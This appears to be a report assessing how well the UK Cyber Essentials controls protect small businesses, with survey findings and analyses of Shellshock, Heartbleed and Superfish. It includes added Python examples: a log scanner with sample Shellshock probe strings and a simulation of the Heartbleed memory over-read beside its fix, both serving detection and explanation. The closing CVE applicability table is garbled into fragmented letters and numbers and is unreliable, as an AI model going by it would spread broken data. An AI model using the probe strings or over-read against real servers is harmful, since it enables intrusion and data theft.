Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation - and could be considered representative of businesses across the UK.

Services: Local - File, Email, Database and Domain Servers are the most common local service providers, all present in more than a third of SMEs. Remote - Email, web hosting and file-sharing are the most common services provided remotely.

User Access: More than half of SMEs permit employees' own devices to be used in the workplace; for organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network - as one vulnerable machine allows vulnerability into the whole company.

Existing Security Measures: Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below this is access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.
Survey Respondents Network
The network built from survey respondents' data considers the overall response in order to build a network easily adaptable to match that of the majority of SME network configurations.

Locally, Email and File servers have been represented, with domain controller capabilities represented in a network ADSL Router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.
Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015. These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.
"ShellShock"

Also known by the name "BashDoor", Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

    GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock". NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

    CVE-2014-6271[13]

The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix based servers for services, mail servers as an example, as they would potentially have no idea that they had been compromised.
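Because the CVE text above names CGI front ends that copy request headers into the environment, the most practical thing an SME operator could do after patching was to look back through web server logs for the telltale function-definition prefix in header values. The block below is an added detection example, not code from the report or from any tool it cites: it parses Apache "combined" format lines with a hand-written regular expression (an assumption about the log format) and flags entries whose request line, Referer or User-Agent begins with the bash function prefix. The log lines are constructed, not captured traffic.

```python
"""Flag Shellshock-style probes in web server access logs.

Added detection example; not code from the report. Vulnerable bash treats an
environment variable whose value starts with "() {" as a function definition
and runs what follows, so that prefix in a request header is the indicator
to hunt for. Sample log lines below are constructed.
"""
import re

# The function-definition prefix, tolerant of the whitespace variants seen in probes.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" log format (assumed): ip ident user [ts] "request" status bytes "referer" "ua"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Fields an external client controls and a CGI handler may copy into the environment.
CLIENT_FIELDS = ("request", "referer", "ua")


def parse_combined(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def matched_field(entry):
    """Name of the first client-controlled field carrying the prefix, or None."""
    for name in CLIENT_FIELDS:
        if SHELLSHOCK_RE.search(entry[name]):
            return name
    return None


def is_shellshock_probe(entry):
    return matched_field(entry) is not None


def scan(lines):
    """Return (source ip, timestamp, field) for every probe; unparsable lines are skipped."""
    hits = []
    for line in lines:
        entry = parse_combined(line)
        if entry is None:
            continue
        name = matched_field(entry)
        if name is not None:
            hits.append((entry["ip"], entry["ts"], name))
    return hits


# Constructed sample log: a benign request, a probe in User-Agent, a probe in Referer, and noise.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Sep/2014:10:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/true"',
    '198.51.100.9 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() {:;}; /bin/true" "curl/7.37"',
    "not a log line",
]

if __name__ == "__main__":
    for ip, ts, name in scan(SAMPLE_LOG):
        print(f"{ts} probe from {ip} in {name}")
```

A hit only shows that a probe arrived; whether it succeeded depends on whether the server ran an unpatched bash behind a CGI handler, which is exactly why the report classes this as a patch-management question.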
"Heartbleed"

Appearing in April 2014, the CVE-2014-0160 (aka "Heartbleed") bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

"The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug."

CVE-2014-0160 [12]

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-unupdated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
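The over-read in the CVE text above comes from trusting the heartbeat message's declared payload length without comparing it against the length of the record actually received. The Python below is an added illustration, not the report's or OpenSSL's code: it models a heartbeat record inside a constructed byte buffer standing in for process memory, shows the unchecked copy returning bytes from beyond the record, and implements the bounds check that the 1.0.1g fix introduced. The function names, the simulated memory buffer and the "secret" bytes are constructed for the example.

```python
import struct

HEARTBEAT_REQUEST = 1
PADDING_MIN = 16          # RFC 6520: at least 16 bytes of padding follow the payload
HEADER_LEN = 1 + 2        # one-byte type, two-byte payload_length


def build_heartbeat(payload, claimed_length=None, padding=b"\x00" * PADDING_MIN):
    """Encode a heartbeat request. `claimed_length` lets the example build a
    message whose declared length disagrees with the bytes actually sent."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + padding


def respond_unchecked(memory):
    """Vulnerable behaviour (OpenSSL 1.0.1 before 1.0.1g), modelled on a
    constructed byte buffer standing in for process memory with the record at
    offset 0: the declared length is trusted and that many bytes are echoed,
    so a short record returns whatever happens to lie beyond it."""
    _, length = struct.unpack("!BH", memory[:HEADER_LEN])
    return memory[HEADER_LEN:HEADER_LEN + length]


def parse_heartbeat_checked(record):
    """The bounds check the fix added: header, declared payload and minimum
    padding must all fit inside the record that was actually received.
    Returns the payload, or None when the message must be discarded."""
    if len(record) < HEADER_LEN + PADDING_MIN:
        return None                      # too short to hold even an empty payload
    hb_type, length = struct.unpack("!BH", record[:HEADER_LEN])
    if hb_type != HEARTBEAT_REQUEST:
        return None
    if HEADER_LEN + length + PADDING_MIN > len(record):
        return None                      # declared payload overruns the record
    return record[HEADER_LEN:HEADER_LEN + length]


# A well-formed request, and one whose declared length (64) exceeds its 5-byte payload.
WELL_FORMED = build_heartbeat(b"hello")
MALFORMED = build_heartbeat(b"hello", claimed_length=64)      # 24 bytes on the wire

# Constructed stand-in for the heap: the malformed record followed by other data
# that the server never intended to send.
SAMPLE_MEMORY = MALFORMED + b"\x00" * 8 + b"CONSTRUCTED-SECRET-KEY-MATERIAL" + b"\x00" * 64


def demo():
    """Return (unchecked_reply, checked_reply) for the malformed record."""
    return respond_unchecked(SAMPLE_MEMORY), parse_heartbeat_checked(MALFORMED)


if __name__ == "__main__":
    leaked, rejected = demo()
    print("unchecked reply length:", len(leaked), "contains secret:", b"SECRET" in leaked)
    print("checked reply:", rejected)
```

The point for an SME is the one the report makes: the check lives inside the OpenSSL library, so nothing in the network configuration removes the over-read; only deploying the patched library (or the provider doing so) does.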
"Superfish"

"The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products."

CVE-2015-2077 [14]

This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.

The vector is through the SuperFish software essentially breaking the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they have full access to any SSL-secured connection from the target machine.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster Page 10 of 28

Thankfully, while the risks to users and SMEs were high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice.
Threat Analysis
ShellShock: Without Cyber Essentials in place, SME 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed: The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL encrypted communications. A break in the chain-of-trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.
Conclusions

The Cyber Essentials Security Tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two-hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope: It is important to consider that the scope of this study covers only internet-based commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.
Additional Tools
The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials Scheme well, to deliver additional security through indirect measures such as User Education & Awareness, along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge on safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for large organisations additional monitoring capability should be explored as a future extension to the Cyber Essentials, not just to identify and mitigate malicious action for more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber-security; a notable example of this is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (approximately 600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.
Cyber Essentials Controls
Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The highest currently used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewall. Patch management, by contrast, isn't necessarily understood by individuals as a tool to greatly improve cyber-security.

Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence, and as such is vital to an organisation's cyber-safety.
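The proportions quoted here (87.5% for patch management, 10% for anti-malware) are tallies over the "With CE" column of the Cyber Controls Applicability table in the appendix. The Python below is an added example rather than the report's own analysis script: it shows that calculation on a handful of rows copied from that table, together with the per-network applicability flags. The keyword mapping from the table's free-text labels onto the five Cyber Essentials controls is an assumption made for this example, as are the function names.

```python
from collections import Counter

# Rows copied from the report's Cyber Controls Applicability table:
# (CVE, applicability flags for SME 1-4 and the idealised network, status
# without CE, status with CE, controls credited). A subset is enough to
# show the calculation.
SAMPLE_ROWS = [
    ("CVE-2013-0008", "yyyyy", "Not Mitigated", "Mitigated",
     "Firewall, Secure Configuration (User Policy), Anti-Malware"),
    ("CVE-2013-0022", "ynyyn", "Not Mitigated", "Mitigated",
     "Patch Management, Secure Configuration (Secure Browser), Website Blacklisting"),
    ("CVE-2013-0140", "ynnnn", "Not Mitigated", "Partially Mitigated", "Patch Management"),
    ("CVE-2013-1140", "nnnnn", "Not Mitigated", "Not Mitigated", "Secure Configuration (Don't install)"),
    ("CVE-2014-0160", "yyyyy", "Not Mitigated", "Partially Mitigated", "Patch Management"),
    ("CVE-2014-4114", "yyyyn", "Not Mitigated", "Mitigated", "Anti-Malware"),
    ("CVE-2014-1477", "yyyyy", "Not Mitigated", "Mitigated", "Firewall, Patch Management"),
    ("CVE-2013-3632", "yyynn", "Not Mitigated", "Mitigated", "Access Policy (Strong Password), Firewall"),
]

# Assumed mapping from the table's free-text labels onto the five controls.
CONTROL_KEYWORDS = {
    "Patch Management": ("patch management", "firmware"),
    "Boundary Firewall": ("firewall",),
    "Secure Configuration": ("secure configuration", "website blacklist"),
    "Access Control": ("access", "strong password"),
    "Malware Protection": ("anti-malware", "malware protection"),
}

NETWORKS = ("SME 1", "SME 2", "SME 3", "SME 4", "Idealised")


def controls_in(label):
    """Set of Cyber Essentials controls a table cell credits."""
    low = label.lower()
    return {name for name, keys in CONTROL_KEYWORDS.items() if any(k in low for k in keys)}


def control_coverage(rows):
    """Fraction of vulnerabilities in which each control contributes to the
    'With CE' outcome (the figure the report quotes as 87.5% for patching)."""
    counts = Counter()
    for _cve, _flags, _without, _with, controls in rows:
        for name in controls_in(controls):
            counts[name] += 1
    return {name: counts[name] / len(rows) for name in CONTROL_KEYWORDS}


def outcome_summary(rows):
    """How many vulnerabilities end up Mitigated / Partially / Not Mitigated with CE."""
    return Counter(row[3] for row in rows)


def applicable_to(rows, network):
    """CVEs the table marks as applicable to one of the five assessed networks."""
    idx = NETWORKS.index(network)
    return [row[0] for row in rows if row[1][idx] == "y"]


if __name__ == "__main__":
    for name, share in sorted(control_coverage(SAMPLE_ROWS).items(), key=lambda kv: -kv[1]):
        print(f"{name:22s} {share:6.1%}")
    print(dict(outcome_summary(SAMPLE_ROWS)))
    print("Idealised network:", applicable_to(SAMPLE_ROWS, "Idealised"))
```

Running the same tally over all two hundred rows of the appendix table reproduces the report's per-control figures; the subset here is only to make the arithmetic visible.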
Recommendations
To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attack mentioned above, which were not within the scope of this report.
References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list/, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, and Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-'-cluster, 2015.

[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
